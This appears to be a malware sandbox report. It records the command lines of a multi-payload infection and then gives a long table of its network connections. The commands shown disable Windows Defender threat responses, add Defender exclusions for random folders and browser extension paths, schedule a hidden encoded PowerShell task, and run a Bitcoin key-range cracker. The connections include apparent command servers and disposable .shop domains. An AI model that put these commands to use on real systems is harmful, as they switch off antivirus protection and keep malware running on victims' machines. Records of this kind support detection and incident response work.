"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService remove GameServerClientC confirm

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService install GameServerClientC "C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"

C:\Program Files (x86)\GameServerClient\GameService.exe

GameService start GameServerClientC

C:\Program Files (x86)\GameServerClient\GameService.exe

"C:\Program Files (x86)\GameServerClient\GameService.exe"

C:\Program Files (x86)\GameServerClient\GameServerClientC.exe

"C:\Program Files (x86)\GameServerClient\GameServerClientC.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\Temp\35748.exe

"C:\Windows\Temp\35748.exe" --coin BTC -m ADDRESSES -t 0 --range 28df28bec40000000:28df28bec80000000 -o xxx0.txt -i C:\Windows\Temp\curjob.bin

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Users\Admin\Pictures\SUjb9Up84Rw8tmFImFpNS5X8.exe

"C:\Users\Admin\Pictures\SUjb9Up84Rw8tmFImFpNS5X8.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1916 -ip 1916

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 936

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1916 -ip 1916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 948

C:\Users\Admin\Pictures\O1c4ldHHgJFVg5LLZai7o8Hy.exe

"C:\Users\Admin\Pictures\O1c4ldHHgJFVg5LLZai7o8Hy.exe"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32

C:\Users\Admin\Pictures\RSM6CiUtofKuWBEZT3YoJA2v.exe

"C:\Users\Admin\Pictures\RSM6CiUtofKuWBEZT3YoJA2v.exe"

C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe

"C:\Users\Admin\Pictures\Tq7u51xB7kGO6x2EiTsCQngJ.exe"

C:\Windows\SysWOW64\choice.exe

choice /C Y /N /D Y /T 3

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gtNABvddg" /SC once /ST 06:49:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gtNABvddg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

Network

Country Destination Domain Proto
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 134.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 206.221.208.4.in-addr.arpa udp
BE 2.17.196.184:443 www.bing.com tcp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 184.196.17.2.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 149.191.110.104.in-addr.arpa udp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 167.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 affordcharmcropwo.shop udp
US 172.67.181.34:443 affordcharmcropwo.shop tcp
US 8.8.8.8:53 cleartotalfisherwo.shop udp
US 104.21.72.132:443 cleartotalfisherwo.shop tcp
US 8.8.8.8:53 34.181.67.172.in-addr.arpa udp
US 8.8.8.8:53 132.72.21.104.in-addr.arpa udp
US 8.8.8.8:53 worryfillvolcawoi.shop udp
US 172.67.199.191:443 worryfillvolcawoi.shop tcp
US 8.8.8.8:53 enthusiasimtitleow.shop udp
US 172.67.183.226:443 enthusiasimtitleow.shop tcp
US 8.8.8.8:53 191.199.67.172.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 dismissalcylinderhostw.shop udp
US 104.21.22.160:443 dismissalcylinderhostw.shop tcp
US 8.8.8.8:53 226.183.67.172.in-addr.arpa udp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 productivelookewr.shop udp
US 172.67.150.207:443 productivelookewr.shop tcp
US 8.8.8.8:53 diskretainvigorousiw.shop udp
DE 185.172.128.33:8970 tcp
US 104.21.23.143:443 diskretainvigorousiw.shop tcp
US 8.8.8.8:53 tolerateilusidjukl.shop udp
US 8.8.8.8:53 160.22.21.104.in-addr.arpa udp
US 8.8.8.8:53 207.150.67.172.in-addr.arpa udp
US 8.8.8.8:53 33.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 143.23.21.104.in-addr.arpa udp
US 104.21.89.202:443 tolerateilusidjukl.shop tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 communicationgenerwo.shop udp
RU 193.233.132.234:80 193.233.132.234 tcp
US 104.21.83.19:443 communicationgenerwo.shop tcp
US 8.8.8.8:53 shatterbreathepsw.shop udp
US 172.67.169.43:443 shatterbreathepsw.shop tcp
US 8.8.8.8:53 pillowbrocccolipe.shop udp
US 104.21.47.56:443 pillowbrocccolipe.shop tcp
US 8.8.8.8:53 shortsvelventysjo.shop udp
US 8.8.8.8:53 202.89.21.104.in-addr.arpa udp
US 8.8.8.8:53 19.83.21.104.in-addr.arpa udp
US 8.8.8.8:53 234.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 43.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 56.47.21.104.in-addr.arpa udp
US 104.21.16.225:443 shortsvelventysjo.shop tcp
US 8.8.8.8:53 incredibleextedwj.shop udp
US 104.21.86.106:443 incredibleextedwj.shop tcp
RU 185.215.113.67:26260 tcp
US 8.8.8.8:53 225.16.21.104.in-addr.arpa udp
US 8.8.8.8:53 alcojoldwograpciw.shop udp
US 172.67.157.23:443 alcojoldwograpciw.shop tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 liabilitynighstjsko.shop udp
US 8.8.8.8:53 106.86.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 23.157.67.172.in-addr.arpa udp
US 104.21.44.3:443 liabilitynighstjsko.shop tcp
US 8.8.8.8:53 demonstationfukewko.shop udp
US 172.67.147.169:443 demonstationfukewko.shop tcp
US 8.8.8.8:53 3.44.21.104.in-addr.arpa udp
FR 52.143.157.84:80 52.143.157.84 tcp
RU 193.233.132.167:80 193.233.132.167 tcp
RU 77.221.151.47:80 77.221.151.47 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 169.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 84.157.143.52.in-addr.arpa udp
US 8.8.8.8:53 47.151.221.77.in-addr.arpa udp
US 172.67.19.24:443 pastebin.com tcp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.175:80 193.233.132.175 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 skategirls.org udp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 realdeepai.org udp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.90.14:443 realdeepai.org tcp
US 8.8.8.8:53 net.geo.opera.com udp
NL 185.26.182.112:80 net.geo.opera.com tcp
US 8.8.8.8:53 jonathantwo.com udp
US 104.21.31.124:443 jonathantwo.com tcp
US 104.21.31.124:443 jonathantwo.com tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 175.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 14.90.21.104.in-addr.arpa udp
US 8.8.8.8:53 yip.su udp
US 172.67.169.89:443 yip.su tcp
RU 5.42.65.67:48396 tcp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 124.31.21.104.in-addr.arpa udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 67.65.42.5.in-addr.arpa udp
US 172.67.169.89:443 yip.su tcp
US 172.67.19.24:443 pastebin.com tcp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 www.google.com udp
RU 193.233.132.175:80 193.233.132.175 tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 iplogger.com udp
US 8.8.8.8:53 10.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 172.67.188.178:443 iplogger.com tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.31.124:443 jonathantwo.com tcp
US 8.8.8.8:53 skategirls.org udp
US 104.21.31.124:443 jonathantwo.com tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
NL 185.26.182.112:443 net.geo.opera.com tcp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 178.188.67.172.in-addr.arpa udp
US 8.8.8.8:53 105.242.123.52.in-addr.arpa udp
RU 5.42.66.10:80 5.42.66.10 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 10.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 59.8.26.104.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
RU 193.233.132.167:80 193.233.132.167 tcp
RU 5.42.66.10:80 5.42.66.10 tcp
US 104.26.8.59:443 api.myip.com tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 note.padd.cn.com udp
US 8.8.8.8:53 20.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 106.76.97.176.in-addr.arpa udp
US 8.8.8.8:53 download.opera.com udp
US 8.8.8.8:53 features.opera-api2.com udp
NL 82.145.216.15:443 features.opera-api2.com tcp
NL 185.26.182.117:443 download.opera.com tcp
US 8.8.8.8:53 15.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 117.182.26.185.in-addr.arpa udp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.228:80 185.172.128.228 tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
US 8.8.8.8:53 download5.operacdn.com udp
US 104.18.11.89:443 download5.operacdn.com tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.76:80 185.172.128.76 tcp
US 8.8.8.8:53 89.11.18.104.in-addr.arpa udp
US 8.8.8.8:53 76.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
DE 185.172.128.76:80 185.172.128.76 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.51:443 download.iolo.net tcp
US 8.8.8.8:53 51.56.244.143.in-addr.arpa udp
RU 77.221.151.47:8080 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
RU 91.215.85.66:15647 tcp
US 8.8.8.8:53 66.85.215.91.in-addr.arpa udp
RU 91.215.85.66:9000 tcp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
